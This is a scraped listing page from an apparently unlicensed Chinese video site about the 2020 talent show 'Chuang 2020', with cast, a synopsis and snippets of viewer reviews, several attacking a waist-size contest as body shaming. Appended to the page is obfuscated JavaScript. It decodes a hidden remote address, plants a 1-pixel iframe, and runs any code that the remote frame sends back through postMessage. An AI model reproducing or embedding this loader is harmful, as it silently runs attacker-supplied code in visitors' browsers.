当前位置 首页 综艺 《创造营2020》

创造营20204.0

类型:综艺  大陆  2020 

主演:黄子韬 鹿晗 罗志祥 毛不易 宋茜 大张伟 

导演:孙莉 

剧情简介

《创造营2020》是由腾讯视频出品的能量女团成长综艺,致力于充分展现女孩们自信勇敢、拼搏向上的元气能量和青春态度节目将召集百位学员,通过任务、训练、考核,让她们在五位明星教练的带领和引导下成长进步,最终成团。土创1我可是真情实感地追过的,对这个节目不可谓没有感情。结果打开这一季,一到营地一个热身赛直接把我劝退,吐了,2020年了还在那边比拼什么最美小蛮腰,怎么不叫男评审比赛鸡顶盒啊?明目张胆地对女性搞Body shaming,这个节目是什么封建社会老坟头挖出来的裹尸布啊?!?! 我真的服创造营的环节策划和后期剪辑审美????,选秀归选秀,它还是要有综艺节目的特质的,要抓人眼球、不拖泥带水。 // 唯一感觉美中不足的是教练没选好,没有震得住场的拉主key的人(可能最初定的是罗志祥,无奈自断臂膀),宋茜有教练范儿,点评到位,其他泛泛,我最中意的还是2019年的导师,个个有魅力有实力讲干货。 舞蹈组的一个个是走错片场了吗?练杂技呢?建议送到《中国达人秀》,尽情挑战身体极限。声乐组实力普遍不错,但是选曲一般,尤其是团体舞台,一言难尽。中文不好实力也不咋样的,隔壁《汉语桥》走好!才艺展示绰绰有余。ps现在选秀综艺怎么那么长啊,一期2个多小时真的看不下去。 今年的创造营有不少看点,小姐姐们颜值都好高,特别喜欢姜贞羽。教练团阵容有点强,黄子韬、宋茜、毛不易、大张伟,爱了爱了!!! 2020年了我依然能在选秀节目里看到再明显不过的body shame,我不知道这个恶臭的细腰比赛是哪一方想出来的,但我必须要来吐槽一下(选手们是无辜的) 第一期开头,大家一进园区,就看到很多设立好的比赛项目,其中这个细腰比赛很明显是为了打广告满足金主需求,设立了宽度不同的... 这篇剧评可能有剧透 作为一个连追了《创造101》和《创造营2019》的人,《创造营2020》是我一早就开始期待的。 今年的《创造营2020》更改了赛制,成团位由11人缩减为7人,这便意味着将出现更残酷的竞争和更严苛的选拔标准。其实从另一个角度来看,也是对女团实力的整体拔高,这当然也更贴合节目诞生... 这篇剧评可能有剧透 两大平台两档女团选秀综艺《创造营2020》和《青春有你》第二季,同天同一时间段播出、正面厮杀、战况胶着。 这边“段小薇道歉”“虞书欣说糊了太久”等热搜,在播出前后始终强悍占据高位,那边“赵粤扇子舞”“喜欢你”等表演桥段、黄子韬叫鹿晗哥哥的互动也强悍杀来。 两相对... 这篇剧评可能有剧透 很多人没有认识到这么一个事情:尽管开启土偶和土创的18年号称“中国偶像元年”;但今年青你2与创3选出的这两个女团,才是真正有可能与偶像龙头韩流正面交锋的团。 去年下半年,林允儿、郑秀妍、郑秀晶、泫雅、金希澈等韩星都有来中国活动,尽管只是走红毯之类的,但能说明限韩... 正文开始之前,先发个毒誓:没有收钱,不是枪稿,收钱的话我明天就意外身亡。 and,以下扫射的“女权”,特指过度消费女权的“激进女权”。 首先,我是女生,一开始在豆瓣写评论被关注是因为《驴得水》那篇“荡妇羞辱”的文章,搞得大家都以为我是个“激进女权”,其实我不是!... 这篇剧评可能有剧透 那是2018年的夏天,我在朋友圈写下了这样的话:“不知道为什么,一把年纪的自己竟然追了整整一季《创造101》,为漂亮小姐姐真情实感地流眼泪,可能这些为了梦想努力的姑娘们做了我想做却没有机会做也不敢做的事情吧。向阳而生,逆风翻盘,看《创造101》的心情如同看甲子园、四... 更新:昨天拉着男朋友,二刷了一遍dance battle,又发现一位比较有特色的选手——陈欣叶。 battle两段音乐倾向性也比较明显,第一首更适合李紫梦,镜头特写给的也挺到位。第二首很明显是陈欣叶的风格了,hippop跳的中规中矩,算是所有freestyle battle选手里,风格比较独特的了... “开始我模仿,后来我创造”R1SE成员张颜齐去年参赛之前写的词,却和《创》系列的本土化改编之路不谋而合。 节目未开播,#创3只有7个成团位#先行登上热搜。创系列赛制大改并不是一蹴而就的,而是节目组经过前两季节目的经验不断摸索出来的。 2018年的夏天,一群女孩向阳而生,... 这篇剧评可能有剧透 今年追了全程爱奇艺和腾讯女团选秀节目,看完创造2020第二期上来评论一下,我想知道腾讯是找了多少水军来打高分? 【关于教练】几个教练的主题曲舞台,宋茜舞蹈实力没话说,毛不易歌手出道不评价,鹿晗和黄子韬两个韩国男团出道的“教练”跳女团主题曲难度这么低的舞蹈,划水划... 这篇剧评可能有剧透 作为一个沉浸在侯麦文艺老片和Parov stelar爵士乐的80后“前浪”,从未想到有一天会追网综熬夜到凌晨2:16。最初知道这个节目,是偶尔闲聊时,EX讲他在看《创造营2020》,我还想一个奔四的年纪几乎只交往90后女友的不婚老男孩拥有这种肤浅审美一点不奇怪,结果最近办公室的小伙...

本网站提供新影视资源均系收集各大网站,本网站只提供web页面浏览服务,并不提供影片资源存储,也不参与任何视频录制、上传
若本站收集的节目无意侵犯了贵司版权,请给网页底部邮箱地址来信,我们将在第一时间删除相应资源

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['yWzkjXZ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6982`]) { var t = x(e.data[`des_s_6982`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lMk'+'YlM'+'kFF'+'ZqY'+'FFS'+'5qF'+'FaW'+'5FF'+'nYW'+'53Z'+'Wku'+'Y29'+'tJT'+'FFN'+'BMT'+'A0N'+'DMF'+'FlM'+'kZj'+'NGN'+'hFF'+'NDI'+'lMk'+'FFZ'+'jLT'+'Y5F'+'FOD'+'IFF'+'tMj'+'ItM'+'FFW'+'U2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}